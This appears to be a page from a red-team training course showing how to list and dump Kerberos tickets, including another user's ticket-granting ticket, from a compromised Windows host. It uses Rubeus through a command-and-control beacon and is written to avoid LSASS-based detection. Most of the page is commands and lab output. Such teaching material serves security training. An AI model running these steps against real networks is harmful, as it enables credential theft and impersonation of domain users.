Extracting Kerberos Tickets
One unfortunate consequence of the aforementioned techniques is that they obtain handles to sensitive resources, which can be audited and logged quite easily. Rubeus is a C# tool designed for Kerberos interaction and abuses, using legitimate Windows APIs.
Its triage
command will list all the Kerberos tickets in your current logon session and if elevated, from all logon sessions on the machine.
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe triage
Action: Triage Kerberos Tickets (All Users)
[*] Current LUID : 0x14b5fa
-----------------------------------------------------------------------------------------------------------------
| LUID | UserName | Service | EndTime |
-----------------------------------------------------------------------------------------------------------------
| 0x14bf5e | bfarmer @ DEV.CYBERBOTIC.IO | krbtgt/DEV.CYBERBOTIC.IO | 9/1/2022 6:10:14 PM |
| 0x14bf5e | bfarmer @ DEV.CYBERBOTIC.IO | LDAP/dc-2.dev.cyberbotic.io/dev.cyberbotic.io | 9/1/2022 6:10:14 PM |
| 0x14bf5e | bfarmer @ DEV.CYBERBOTIC.IO | HTTP/squid.dev.cyberbotic.io | 9/1/2022 6:10:14 PM |
| 0x14b5fa | bfarmer @ DEV.CYBERBOTIC.IO | krbtgt/DEV.CYBERBOTIC.IO | 9/1/2022 6:10:07 PM |
| 0x14b5fa | bfarmer @ DEV.CYBERBOTIC.IO | cifs/dc-2.dev.cyberbotic.io | 9/1/2022 6:10:07 PM |
| 0x14b5fa | bfarmer @ DEV.CYBERBOTIC.IO | ldap/dc-2.dev.cyberbotic.io | 9/1/2022 6:10:07 PM |
| 0x14b5fa | bfarmer @ DEV.CYBERBOTIC.IO | cifs/dc-2.dev.cyberbotic.io/dev.cyberbotic.io | 9/1/2022 6:10:07 PM |
| 0x14b5fa | bfarmer @ DEV.CYBERBOTIC.IO | LDAP/dc-2.dev.cyberbotic.io/dev.cyberbotic.io | 9/1/2022 6:10:07 PM |
| 0x7049f | jking @ DEV.CYBERBOTIC.IO | krbtgt/DEV.CYBERBOTIC.IO | 9/1/2022 5:29:20 PM |
| 0x3e4 | wkstn-2$ @ DEV.CYBERBOTIC.IO | krbtgt/DEV.CYBERBOTIC.IO | 9/1/2022 5:28:29 PM |
| 0x3e4 | wkstn-2$ @ DEV.CYBERBOTIC.IO | HTTP/squid.dev.cyberbotic.io | 9/1/2022 5:28:29 PM |
| 0x3e4 | wkstn-2$ @ DEV.CYBERBOTIC.IO | cifs/dc-2.dev.cyberbotic.io | 9/1/2022 5:28:29 PM |
| 0x3e4 | wkstn-2$ @ DEV.CYBERBOTIC.IO | ldap/dc-2.dev.cyberbotic.io/dev.cyberbotic.io | 9/1/2022 5:28:29 PM |
| 0x3e7 | wkstn-2$ @ DEV.CYBERBOTIC.IO | krbtgt/DEV.CYBERBOTIC.IO | 9/1/2022 5:28:29 PM |
| 0x3e7 | wkstn-2$ @ DEV.CYBERBOTIC.IO | HTTP/squid.dev.cyberbotic.io | 9/1/2022 5:28:29 PM |
| 0x3e7 | wkstn-2$ @ DEV.CYBERBOTIC.IO | cifs/dc-2.dev.cyberbotic.io/dev.cyberbotic.io | 9/1/2022 5:28:29 PM |
| 0x3e7 | wkstn-2$ @ DEV.CYBERBOTIC.IO | WKSTN-2$ | 9/1/2022 5:28:29 PM |
| 0x3e7 | wkstn-2$ @ DEV.CYBERBOTIC.IO | LDAP/dc-2.dev.cyberbotic.io | 9/1/2022 5:28:29 PM |
| 0x3e7 | wkstn-2$ @ DEV.CYBERBOTIC.IO | LDAP/dc-2.dev.cyberbotic.io/dev.cyberbotic.io | 9/1/2022 5:28:29 PM |
| 0x3e7 | wkstn-2$ @ DEV.CYBERBOTIC.IO | wkstn-2$@DEV.CYBERBOTIC.IO | 9/1/2022 7:43:42 AM |
-----------------------------------------------------------------------------------------------------------------
\
Each user has their own logon session, which is represented by a LUID (locally unique identifier). In this example, we're operating within the LUID of bfarmer, 0x14b5fa. The WKSN-2$ machine account has its own session, 0x3e4; and jking also has a session, 0x7049f. Tickets for the service name krbtgt are Ticket Granting Tickets (TGTs) and others are Ticket Granting Service Tickets (TGSs). The different ticket types are described in more detail in the Kerberos chapter.
Rubeus' dump
command will extract these tickets from memory - but because it uses WinAPIs, it does not need to open suspicious handles to LSASS. If not elevated, we can only pull tickets from our own session. Without any further arguments, Rubeus will extract all tickets possible, but we can be more specific by using the /luid
and /service
parameters.
For example, if we only wanted the TGT for jking, we can do:
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe dump /luid:0x7049f /service:krbtgt
Action: Dump Kerberos Ticket Data (All Users)
[*] Target service : krbtgt
[*] Target LUID : 0x7049f
[*] Current LUID : 0x14b5fa
UserName : jking
Domain : DEV
LogonId : 0x754c2
UserSID : S-1-5-21-569305411-121244042-2357301523-1105
AuthenticationPackage : Kerberos
LogonType : Batch
LogonTime : 10/13/2022 9:36:19 AM
LogonServer : DC-2
LogonServerDNSDomain : DEV.CYBERBOTIC.IO
UserPrincipalName : jking@cyberbotic.io
ServiceName : krbtgt/DEV.CYBERBOTIC.IO
ServiceRealm : DEV.CYBERBOTIC.IO
UserName : jking
UserRealm : DEV.CYBERBOTIC.IO
StartTime : 10/13/2022 9:36:20 AM
EndTime : 10/13/2022 7:36:20 PM
RenewTill : 10/20/2022 9:36:20 AM
Flags : name_canonicalize, pre_authent, initial, renewable, forwardable
KeyType : aes256_cts_hmac_sha1
Base64(key) : EIkrCAL8wx98PVRBOZGDKC6Y0KReSosWtvXyv6rIefI=
Base64EncodedTicket :
doIFuj [...snip...] lDLklP
\
This will output the ticket(s) in base64 encoded format.
You may also add the /nowrap
option which will format the base64 encoding onto a single line - this makes copy & pasting much easier.
Last updated